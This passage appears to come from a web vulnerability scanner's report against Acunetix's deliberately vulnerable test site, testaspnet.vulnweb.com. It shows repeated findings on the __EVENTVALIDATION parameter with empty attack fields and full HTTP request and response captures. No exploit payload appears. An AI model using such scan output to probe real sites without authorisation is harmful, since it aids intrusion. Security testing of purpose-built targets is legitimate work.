style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8161&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAFl3zLtoIZGRk2Nj6jEGwPfwOkexxfPTrW6CO224%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLvkPqABwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPyQJJstCgBfDGfqzOeEMGxIeeFSU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:12:34 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAFl3zLtoIZGRk2Nj6jEGwPfwOkexxfPTrW6CO224=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLvkPqABwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPyQJJstCgBfDGfqzOeEMGxIeeFSU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:White" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1107 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,107 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8476&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBANY16JtsIZGRkQPrqNHDU7SLUYyjMjNn4CNgxikQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLvquPoDALRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJNbxhfsHk9G36l2Al0lZ4GNajcUU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:36 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBANY16JtsIZGRkQPrqNHDU7SLUYyjMjNn4CNgxikQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLvquPoDALRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJNbxhfsHk9G36l2Al0lZ4GNajcUU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:White" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p 